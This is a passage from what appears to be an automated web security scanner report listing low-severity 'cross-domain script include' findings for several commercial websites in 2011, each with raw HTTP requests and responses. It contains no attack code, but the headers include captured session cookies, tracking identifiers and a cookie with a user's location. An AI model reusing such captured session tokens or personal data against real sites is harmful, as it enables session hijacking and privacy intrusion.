Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.55.8.47
X-Cnection: close
Date: Tue, 26 Apr 2011 18:38:53 GMT
Content-Length: 8536

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yh/r/nogz-s5wETe.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yU/r/I8QAd_a7Pbh.js"></script>
...[SNIP]...

20.73. http://www.magellangps.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magellangps.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.magellangps.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 21:39:21 GMT
Server: Apache
Cache-Control: No-Cache,no-store
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: 683260212:73686F702D6A6176613030392E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=MX8nN37JhRs4xgQhh5W7Lnb1Jc53pNQpqjTjC92CxyDtCYMrGLGkPwl7ttpLG17bGb2p89w1rry3cT4nB4JL2sZLLqQbXyts352vgQmSTCGhlQHnCT1z29G4QyVNL06W!-1123747554; path=/
Set-Cookie: NLVisitorId=rcHW8655AUWRwK0L; domain=www.magellangps.com; expires=Monday, 16-Apr-2012 21:39:22 GMT; path=/
Set-Cookie: NLShopperId=rcHW8655AUiRwJPx; domain=www.magellangps.com; expires=Tuesday, 03-May-2011 21:39:22 GMT; path=/
Set-Cookie: NS_VER=2011.1.0; domain=www.magellangps.com; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 77084


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-Strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>
...[SNIP]...
</style>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
</script>
<script language="javascript" type="text/javascript" src="https://api.qualifiedaddress.com/Scripts/Library.js"></script>
<script language="javascript" type="text/javascript" src="https://api.qualifiedaddress.com/Scripts/Qad.js"></script>
...[SNIP]...

20.74. http://www.magellangps.com/Products/eXploristseries  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magellangps.com
Path:   /Products/eXploristseries

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /Products/eXploristseries HTTP/1.1
Host: www.magellangps.com
Proxy-Connection: keep-alive
Referer: http://www.magellangps.com/lp/eXploristfamily/screens.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=Q0VpN37HL9PBT1v5Z2ZGLH52C2T8QHJMwxQGWKxnCLrGQHjY4DnJV1TLb71TqCryvY2ngbbhwBYJvxwS95gZmdmPBTtNhlByXP6J17XqTFLLtpLShpCxYJkqfmQ1yGBW!-1425410427; NLVisitorId=rcHW8655Ac-HwJur; NLShopperId=rcHW8655AeSHwA-v; NS_VER=2011.1.0; __utmz=1.1303853977.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1403725269.1303853977.1303853977.1303853977.1; __utmc=1; __utmb=1.1.10.1303853977

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 21:40:13 GMT
Server: Apache
Expires: 0
Last-Modified: Tue, 26 Apr 2011 21:40:11 GMT
NS_RTIMER_COMPOSITE: 684041816:73686F702D6A6176613030372E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 86023


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>
...[SNIP]...
</script>
<script language="JavaScript" src="http://content.channelintelligence.com/scripts/ykb_PopupWindow.js" type="text/javascript"></script>
...[SNIP]...
</style>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
</script>
<script language="javascript" type="text/javascript" src="https://api.qualifiedaddress.com/Scripts/Library.js"></script>
<script language="javascript" type="text/javascript" src="https://api.qualifiedaddress.com/Scripts/Qad.js"></script>
...[SNIP]...

20.75. http://www.magellangps.com/s.nl  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magellangps.com
Path:   /s.nl

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /s.nl?sc=3&whence=&custcol_celigo_serialno= HTTP/1.1
Host: www.magellangps.com
Proxy-Connection: keep-alive
Referer: http://www.magellangps.com/Products/eXploristseries
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=Q0VpN37HL9PBT1v5Z2ZGLH52C2T8QHJMwxQGWKxnCLrGQHjY4DnJV1TLb71TqCryvY2ngbbhwBYJvxwS95gZmdmPBTtNhlByXP6J17XqTFLLtpLShpCxYJkqfmQ1yGBW!-1425410427; NLVisitorId=rcHW8655Ac-HwJur; NS_VER=2011.1.0; __utmz=1.1303853977.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1403725269.1303853977.1303853977.1303853977.1; __utmc=1; __utmb=1.2.10.1303853977; NLShopperId=rcHW8655AeSHwA-v

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 21:40:27 GMT
Server: Apache
Cache-Control: No-Cache,no-store
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -1577135949:73686F702D6A6176613030372E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 53685


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>
...[SNIP]...
</style>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
</script>
<script language="javascript" type="text/javascript" src="https://api.qualifiedaddress.com/Scripts/Library.js"></script>
<script language="javascript" type="text/javascript" src="https://api.qualifiedaddress.com/Scripts/Qad.js"></script>
...[SNIP]...

20.76. http://www.moxiesoft.com/tal_about/contact.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.moxiesoft.com
Path:   /tal_about/contact.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /tal_about/contact.aspx HTTP/1.1
Host: www.moxiesoft.com
Proxy-Connection: keep-alive
Referer: http://www.moxiesoft.com/tal_about/aboutus.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=wr0m3unymc3ai445usuyu43k; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; TalismaCookie=unknown.direct_entry.04/26/2011; __utmz=162954400.1303851424.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.298774119.1303851424.1303851424.1303851424.1; __utmc=162954400; __utmb=162954400.7.10.1303851424

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 21:10:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 35796


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...
<![endif]-->
   
   <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.2/swfobject.js"></script>
...[SNIP]...

20.77. http://www.moxiesoft.com/tal_products/employee-spaces.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.moxiesoft.com
Path:   /tal_products/employee-spaces.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /tal_products/employee-spaces.aspx HTTP/1.1
Host: www.moxiesoft.com
Proxy-Connection: keep-alive
Referer: http://www.moxiesoft.com/tal_products/knowledgebase.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=wr0m3unymc3ai445usuyu43k; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; TalismaCookie=unknown.direct_entry.04/26/2011; __utmz=162954400.1303851424.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.298774119.1303851424.1303851424.1303851424.1; __utmc=162954400; __utmb=162954400.1.10.1303851424

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 21:01:47 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 42769


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...
<link type="text/css" media="screen" rel="stylesheet" href="spaces-assets/colorbox/colorbox.css" />
   <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...

20.78. http://www.moxiesoft.com/tal_products/knowledgebase.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.moxiesoft.com
Path:   /tal_products/knowledgebase.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /tal_products/knowledgebase.aspx HTTP/1.1
Host: www.moxiesoft.com
Proxy-Connection: keep-alive
Referer: http://www.moxiesoft.com/tal_products/products.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=wr0m3unymc3ai445usuyu43k; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; TalismaCookie=unknown.direct_entry.04/26/2011; __utmz=162954400.1303851424.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.298774119.1303851424.1303851424.1303851424.1; __utmc=162954400; __utmb=162954400.3.10.1303851424

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:57:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44262


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...
</script><script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js"><!--
//-->
...[SNIP]...
</script>
   <script language="javascript" src="http://ngencim.ngenera.com/netagent/proactive/proactive.aspx"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...

20.79. http://www.msn.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.msn.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: www.msn.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=V=3&GUID=fdd1ad8ef8e24cf9bbad7ff7c197392d; mh=MSFT; CC=US; CULTURE=EN-US; expid=id=79281a2784894bbe8e11de358b20f4da&bd=2011-04-23T14:00:24.831&v=2; Sample=37; MUID=B506C07761D7465D924574124E3C14DF; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 18:35:24 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: CO1MPPRENA35
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: expac=40II8A39_0214:WP10_5|; domain=www.msn.com; expires=Fri, 29-Apr-2011 18:35:24 GMT; path=/
Set-Cookie: expid=id=79281a2784894bbe8e11de358b20f4da&bd=2011-04-23T14:00:24.831&v=2; domain=msn.com; expires=Tue, 10-May-2011 18:35:24 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
ntCoent-Length: 83624
Content-Length: 83624

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><m
...[SNIP]...
<![endif]--><script type="text/javascript" src="http://col.stj.s-msn.com/br/sc/js/jquery/jquery-1.4.2.min.js"></script>
...[SNIP]...

20.80. http://www.msn.com/sck.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.msn.com
Path:   /sck.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /sck.aspx?cv=_SS%3dSID%3dBADDC820B268422C99FA89F5582D20C7%3b&h=36aef2a7-994a-6863-3092-2a28e086b0e4 HTTP/1.1
Host: www.msn.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/sck?cn=_SS&r=http://www.msn.com/sck.aspx&h=36aef2a7-994a-6863-3092-2a28e086b0e4
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=V=3&GUID=fdd1ad8ef8e24cf9bbad7ff7c197392d; mh=MSFT; CC=US; CULTURE=EN-US; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; expac=40II8A39_0214:WP10_5|; expid=id=79281a2784894bbe8e11de358b20f4da&bd=2011-04-23T14:00:24.831&v=2; Sample=37; MUID=B506C07761D7465D924574124E3C14DF

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 18:35:45 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: CO1MPPRENA36
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Cteonnt-Length: 2568
Content-Length: 2568

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><m
...[SNIP]...
<![endif]--><script type="text/javascript" src="http://col.stj.s-msn.com/br/sc/js/1c/4a0253de6eac448d8f2c39c53f8926.js" xmlns="http://www.w3.org/1999/xhtml"></script>
...[SNIP]...

20.81. http://www.myhomemsn.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.myhomemsn.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.myhomemsn.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Wed, 24 Nov 2010 18:39:14 GMT
Accept-Ranges: bytes
ETag: "c26075e468ccb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 18:38:45 GMT
Content-Length: 19444

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv=
...[SNIP]...
<!-- SiteCatalyst code version: H.21.
   Copyright 1996-2010 Adobe, Inc. All Rights Reserved
   More info available at http://www.omniture.com -->
   <script language="JavaScript" type="text/javascript" src="http://myhomemsn.vo.msecnd.net/js/s_code.js"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://cetrk.com/pages/scripts/0009/2911.js"> </script>
...[SNIP]...

20.82. http://www.randomhouse.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.randomhouse.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.randomhouse.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 22:05:44 GMT
Server: Apache/2.0.63 (Unix) PHP/5.2.6 mod_fastcgi/2.4.6 mod_perl/2.0.4 Perl/v5.8.7
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.randomhouse.com//xmlrpc.php
Content-Type: text/html; charset=UTF-8
Content-Length: 54541

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>

       <meta http-equiv="conte
...[SNIP]...
</script>
       <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.2/jquery.min.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="//secure.quantserve.com/quant.js"></script>
...[SNIP]...

20.83. http://www.randomhouse.com/about/contact.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.randomhouse.com
Path:   /about/contact.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /about/contact.html HTTP/1.1
Host: www.randomhouse.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RES_TRACKINGID=686529694590717; __qca=P0-874375948-1303855562358; s_vi=[CS]v1|26DBA0E0051D3102-60000104C025ACEA[CE]; s_cc=true; s_sq=%5B%5BB%5D%5D; mbox=session#1303855598284-166145#1303858211|PC#1303855598284-166145#1366928351|check#true#1303856411; RES_SESSIONID=212207240983843; ResonanceSegment=1

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 22:38:58 GMT
Server: Apache/2.0.63 (Unix) PHP/5.2.6 mod_fastcgi/2.4.6 mod_perl/2.0.4 Perl/v5.8.7
Last-Modified: Fri, 22 Apr 2011 14:18:27 GMT
Accept-Ranges: bytes
Content-Length: 21915
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <script src="/art/bw06/r
...[SNIP]...
</script>
<script type="text/javascript" src="//secure.quantserve.com/quant.js"></script>
...[SNIP]...

20.84. http://www.randomhouse.com/about/faq/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.randomhouse.com
Path:   /about/faq/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /about/faq/ HTTP/1.1
Host: www.randomhouse.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RES_TRACKINGID=686529694590717; RES_SESSIONID=212207240983843; ResonanceSegment=1; __qca=P0-874375948-1303855562358; s_cc=true; SC_LINKS=%5B%5BB%5D%5D; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26DBA0E0051D3102-60000104C025ACEA[CE]

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 22:06:27 GMT
Server: Apache/2.0.63 (Unix) PHP/5.2.6 mod_fastcgi/2.4.6 mod_perl/2.0.4 Perl/v5.8.7
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Content-Length: 24275

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <script src="/art/bw06/r
...[SNIP]...
</script>
<script type="text/javascript" src="//secure.quantserve.com/quant.js"></script>
...[SNIP]...

20.85. http://www.randomhouse.com/about/faq/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.randomhouse.com
Path:   /about/faq/index.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /about/faq/index.php?ToDo=contact HTTP/1.1
Host: www.randomhouse.com
Proxy-Connection: keep-alive
Referer: http://www.randomhouse.com/about/contact.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RES_TRACKINGID=686529694590717; __qca=P0-874375948-1303855562358; s_vi=[CS]v1|26DBA0E0051D3102-60000104C025ACEA[CE]; mbox=session#1303855598284-166145#1303858226|PC#1303855598284-166145#1366928366|check#true#1303856426; RES_SESSIONID=212207240983843; ResonanceSegment=1; s_cc=true; SC_LINKS=about%3Acontact.html%3A%3A%5E%5Ee-mail%20Customer%20Service%5E%5Eabout%3Acontact.html%3A%3A%20%7C%20e-mail%20Customer%20Service%5E%5E; s_sq=ranhrollup%3D%2526pid%253Dabout%25253Acontact.html%25253A%25253A%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.randomhouse.com%25252Fabout%25252Ffaq%25252Findex.php%25253FToDo%25253Dcontact%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 22:40:30 GMT
Server: Apache/2.0.63 (Unix) PHP/5.2.6 mod_fastcgi/2.4.6 mod_perl/2.0.4 Perl/v5.8.7
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Content-Length: 15225

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <script src="/art/bw06/r
...[SNIP]...
</script>
<script type="text/javascript" src="//secure.quantserve.com/quant.js"></script>
...[SNIP]...

20.86. http://www.realtor.com/search/widgetportal/Widget.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.realtor.com
Path:   /search/widgetportal/Widget.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /search/widgetportal/Widget.aspx?wname=MainSearchXSLContainer&app=8bcac8850c63428982ba6b6b90c09cfa&zip=75207 HTTP/1.1
Host: www.realtor.com
Proxy-Connection: keep-alive
Referer: http://realestate.msn.com/article.aspx?cp-documentid=28280145
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 18:46:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
